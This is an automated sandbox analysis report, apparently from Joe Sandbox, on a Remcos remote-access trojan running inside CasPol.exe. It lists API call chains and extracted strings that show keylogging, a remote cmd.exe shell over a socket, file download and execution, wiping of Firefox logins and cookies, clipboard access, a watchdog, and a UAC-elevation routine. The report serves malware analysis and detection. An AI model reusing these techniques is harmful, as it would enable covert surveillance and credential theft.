                                                                                                                    • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                    • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                    • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                  • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                    • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                  • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                  • API String ID: 2918587301-599666313
                                                                                                                  • Opcode ID: 78de763cea10c2641bb49b821402416fcbe10fd49433a8ca9001545f10aee179
                                                                                                                  • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                                                                                                  • Opcode Fuzzy Hash: 78de763cea10c2641bb49b821402416fcbe10fd49433a8ca9001545f10aee179
                                                                                                                  • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                                                                                                  APIs
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                    • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                    • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                  • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                  • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                                                                                                    • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                    • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                  • Sleep.KERNEL32(0000012C,00000093), ref: 0040523F
                                                                                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                    • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                  • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                  • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                  • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                  • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                  • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                  • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                                  • API String ID: 3815868655-1274243119
                                                                                                                  • Opcode ID: 2f13f051ee71259a3c174462a22be917dc54584fa79189f6e3402696e7dee425
                                                                                                                  • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                                                                                  • Opcode Fuzzy Hash: 2f13f051ee71259a3c174462a22be917dc54584fa79189f6e3402696e7dee425
                                                                                                                  • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                    • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                    • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                    • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                  • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                  • API String ID: 65172268-860466531
                                                                                                                  • Opcode ID: 1b06664216523bb5c8c2fc66387d896761bb74854a25fd9595ef5ff69de13416
                                                                                                                  • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                                                                                                  • Opcode Fuzzy Hash: 1b06664216523bb5c8c2fc66387d896761bb74854a25fd9595ef5ff69de13416
                                                                                                                  • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                                                                                  APIs
                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                  • API String ID: 1164774033-3681987949
                                                                                                                  • Opcode ID: 190d276d9c47510b5bdea1a905980982a89fd1a317b2ad81107ad6a5393c46f2
                                                                                                                  • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                                                                                                  • Opcode Fuzzy Hash: 190d276d9c47510b5bdea1a905980982a89fd1a317b2ad81107ad6a5393c46f2
                                                                                                                  • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                  APIs
                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                  • API String ID: 3527384056-432212279
                                                                                                                  • Opcode ID: 10f8a3fd89f28991198fb062d5e31d2512f3de5455c108c21fe86ebc9d22beae
                                                                                                                  • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                                                                                  • Opcode Fuzzy Hash: 10f8a3fd89f28991198fb062d5e31d2512f3de5455c108c21fe86ebc9d22beae
                                                                                                                  • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                  • API String ID: 726551946-3025026198
                                                                                                                  • Opcode ID: edf06e4f099b05c1f558ccb755c035a16f9f3693c1ac1a0985226843a19e3498
                                                                                                                  • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                                                                                                  • Opcode Fuzzy Hash: edf06e4f099b05c1f558ccb755c035a16f9f3693c1ac1a0985226843a19e3498
                                                                                                                  • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                                                                                                  APIs
                                                                                                                  • OpenClipboard.USER32 ref: 004159C7
                                                                                                                  • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                  • OpenClipboard.USER32 ref: 00415A61
                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                  • CloseClipboard.USER32 ref: 00415A89
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3520204547-0
                                                                                                                  • Opcode ID: 48a737ec427946de25fb1777b3112fdee2b2cad8e203a9c0251e16d68b009561
                                                                                                                  • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                                                                                                                  • Opcode Fuzzy Hash: 48a737ec427946de25fb1777b3112fdee2b2cad8e203a9c0251e16d68b009561
                                                                                                                  • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: 0$1$2$3$4$5$6$7
                                                                                                                  • API String ID: 0-3177665633
                                                                                                                  • Opcode ID: 71697206334f9f2bca7fe39ab7c56b0ab69560120ed9af9d79647fc5a993506d
                                                                                                                  • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                                                                                                                  • Opcode Fuzzy Hash: 71697206334f9f2bca7fe39ab7c56b0ab69560120ed9af9d79647fc5a993506d
                                                                                                                  • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                  • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                  • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                  • String ID: X[G
                                                                                                                  • API String ID: 1888522110-739899062
                                                                                                                  • Opcode ID: d91d0540f812f4871974057b5933cd142222a9cf3d101d705a5052a8f4d3ab48
                                                                                                                  • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                                                                                                                  • Opcode Fuzzy Hash: d91d0540f812f4871974057b5933cd142222a9cf3d101d705a5052a8f4d3ab48
                                                                                                                  • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                                                                                                                  APIs
                                                                                                                  • _wcslen.LIBCMT ref: 00406788
                                                                                                                  • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Object_wcslen
                                                                                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                  • API String ID: 240030777-3166923314
                                                                                                                  • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                                  • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                                                                                                  • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                                  • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                                                                                                  APIs
                                                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                                                                                                  • GetLastError.KERNEL32 ref: 00419945
                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3587775597-0
                                                                                                                  • Opcode ID: 9221a97e37ce63e1dfc2a590e15a2d383158a23c63d16956968e5530d48b3d55
                                                                                                                  • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                                                                                                  • Opcode Fuzzy Hash: 9221a97e37ce63e1dfc2a590e15a2d383158a23c63d16956968e5530d48b3d55
                                                                                                                  • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                                                                                                  APIs
                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                                                                                                                    • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2341273852-0
                                                                                                                  • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                                  • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                                                                                                  • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                                  • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                  • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                  • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                  • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                  • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                  Strings
                                                                                                                  • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                  • String ID: Keylogger initialization failure: error
                                                                                                                  • API String ID: 3219506041-952744263
                                                                                                                  • Opcode ID: 8a150b850c40751c4d3c51e8045edfae491f6e30bd8adda2b22654e8f725d179
                                                                                                                  • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                                                                                                  • Opcode Fuzzy Hash: 8a150b850c40751c4d3c51e8045edfae491f6e30bd8adda2b22654e8f725d179
                                                                                                                  • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                                                                                                  APIs
                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041301A
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413026
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                  • API String ID: 2127411465-314212984
                                                                                                                  • Opcode ID: 62864654b4172c23c36bd298797ba6ffba39aa4c150a1d12abcd8472de587f0f
                                                                                                                  • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                                                                                  • Opcode Fuzzy Hash: 62864654b4172c23c36bd298797ba6ffba39aa4c150a1d12abcd8472de587f0f
